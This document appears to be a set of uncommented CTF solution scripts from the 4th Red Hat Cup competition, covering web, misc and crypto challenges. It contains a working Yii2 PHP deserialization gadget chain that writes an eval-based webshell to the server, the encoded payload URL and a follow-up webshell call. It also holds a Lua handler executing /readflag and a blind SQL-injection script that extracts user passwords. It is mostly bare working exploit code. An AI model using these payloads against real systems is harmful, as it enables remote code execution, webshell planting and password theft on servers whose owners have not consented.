第四届红帽杯网络安全大赛

from PIL import Image
import matplotlib.pyplot as plt

f1 = open('data1')
c1 = f1.read()
c1 = c1.split(' ')
print(c1)
print(len(c1))

f = open('data2','rb')
c = f.read()
res = []
for i in range(len(c)//3):
    yyy = c[i*3:i*3+3]
    r,g,b = yyy[0],yyy[1],yyy[2]
    res.append((r,g,b))
print(len(res))
print(res)

rr = []
for i in c1[:-1]:
    rr.append(res[int(i)])
print(rr)
a = 191
b = 37
img = Image.new('RGB',(b,a),(255,255,255))
for j in range(b):
    for i in range(a):
        img.putpixel((j,i),rr[i+j*a])
plt.imshow(img)
img.save('flag.png')

<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            $this->checkAccess = 'assert';
            $this->id = 'file_put_contents("php://filter/write=convert.base64-decode/resource=/var/www/html/web/assets/5118a5d1/fonts/b.php","PD9waHAgZXZhbCgkX0dFVFthXSk7Pz4K")';
            $this->modelClass='DynamicModel';
            $this->scenario='111';
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;
    class Generator{
        protected $formatters;
        public function __construct(){
            $this->formatters['close'] = [new CreateAction(), 'run'];
        }
    }
}
 
namespace yii\db{
    use Faker\Generator;
    class BatchQueryResult{
        private $_dataReader;
        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}

namespace{
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>

#http://eci-2zeab1jn4vnk38xn572o.cloudeci1.ichunqiu.com/index.php?r=site%2Fabout&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6NDp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NjoiYXNzZXJ0IjtzOjI6ImlkIjtzOjE1MToiZmlsZV9wdXRfY29udGVudHMoInBocDovL2ZpbHRlci93cml0ZT1jb252ZXJ0LmJhc2U2NC1kZWNvZGUvcmVzb3VyY2U9L3Zhci93d3cvaHRtbC93ZWIvYXNzZXRzLzUxMThhNWQxL2ZvbnRzL2IucGhwIiwiUEQ5d2FIQWdaWFpoYkNna1gwZEZWRnRoWFNrN1B6NEsiKSI7czoxMDoibW9kZWxDbGFzcyI7czoxMjoiRHluYW1pY01vZGVsIjtzOjg6InNjZW5hcmlvIjtzOjM6IjExMSI7fWk6MTtzOjM6InJ1biI7fX19fQ==

http://eci-2zeab1jn4vnk38xn572o.cloudeci1.ichunqiu.com/assets/5118a5d1/fonts/harvey.php?a=eval($_POST[harvey]); 

AddHandler lua-script .lua

require "string"

--[[
     This is the default method name for Lua handlers, see the optional
     function-name in the LuaMapHandler directive to choose a different
     entry point.
--]]
function handle(r)
    r.content_type = "text/plain"
    r:puts("Hello Lua World!\n")
    local t = io.popen('/readflag')
    local a = t:read("*all")
    r:puts(a)
    if r.method == 'GET' then
        for k, v in pairs( r:parseargs() ) do
            r:puts( string.format("%s: %s\n", k, v) )
        end
    else
        r:puts("Unsupported HTTP method " .. r.method)
    end
end

import requests

url='http://eci-2zeg1tmyhxfbqrmxi9m1.cloudeci1.ichunqiu.com/image.php?id=3'
payload='^((ascii(substr((select(group_concat(password))from(users)),{},1)))={})'
s='1234567890abcdef'

for i in range(1,30):
    for b in s:
        payloads=payload.format(i,ord(b))
        a=requests.get(url+payloads)
        #print(url+payloads)
        if len(a.text)<19000:
            print(b)
            break
        else:
            pass

import math
from decimal import *
import random
import struct

getcontext().prec = int(100)

primes = [2]
for i in range(3, 100):
    f = True
    for j in primes:
        if i * i < j:
            break
        if i % j == 0:
            f = False
            break
    if f:
        primes.append(i)

keys = []
for i in range(len(primes)):
    keys.append(Decimal(int(primes[i])).ln())

arr = []
for v in keys:
    arr.append(int(v * int(16) ** int(64)))

ct = 597952043660446249020184773232983974017780255881942379044454676980646417087515453

def encrypt(res):
    h = Decimal(int(0))
    for i in range(len(keys)):
        h += res[i] * keys[i]

    ct = int(h * int(16)**int(64))
    return ct

def f(N):
    ln = len(arr)
    A = Matrix(ZZ, ln + 1, ln + 1)
    for i in range(ln):
        A[i, i] = 1
        A[i, ln] = arr[i] // N
        A[ln, i] = 64

    A[ln, ln] = ct // N

    res = A.LLL()

    for i in range(ln + 1):
        flag = True
        for j in range(ln):
            if -64 <= res[i][j] < 64:
                continue
            flag = False
            break
        if flag:
            vec = [int(v + 64) for v in res[i][:-1]]
            ret = encrypt(vec)
            if ret == ct:
                print(N, bytes(vec))
            else:
                print("NO", ret, bytes(vec))

for i in range(2, 10000):
    print(i)
    f(i)

import itertools
import struct

p = 10000000000000001119

R.<x> = GF(p)[]; y=x
f = y + prod(map(eval, 'yyyyyyy'))
C = HyperellipticCurve(f, 0)
J = C.jacobian()
Ds = [J(C(x, min(f(x).sqrt(0,1)))) for x in (11,22,33)]

enc = bytes.fromhex('66def695b20eeae3141ea80240e9bc7138c8fc5aef20532282944ebbbad76a6e17446e92de5512091fe81255eb34a0e22a86a090e25dbbe3141aff0542f5')
known_pt = b"a"*20 + b"flag"

rng_output = bytes(e^^m for e,m in zip(enc, known_pt))

blocks = [rng_output[i:i+8] for i in range(0, len(rng_output), 8)]
ui = [int.from_bytes(r, 'little') for r in blocks]
u = x^3 + ui[2]*x^2 + ui[1]*x + ui[0]

L = GF(p).algebraic_closure()
roots = [r[0] for r in u.change_ring(L).roots()]

RR.<zz> = PolynomialRing(L)
v = RR.lagrange_polynomial([(xi, f(xi).sqrt()) for xi in roots])
vi = [v.coefficients()[i].as_finite_field_element()[1] for i in range(3)]
vi = [(int(-c), int(c)) for c in vi]

for rs in itertools.product(*vi):
    q = struct.pack('<'+'Q'*len(rs), *rs)

    flag = bytes(k^^m for k,m in zip(2*(rng_output+q), enc))
    print(flag)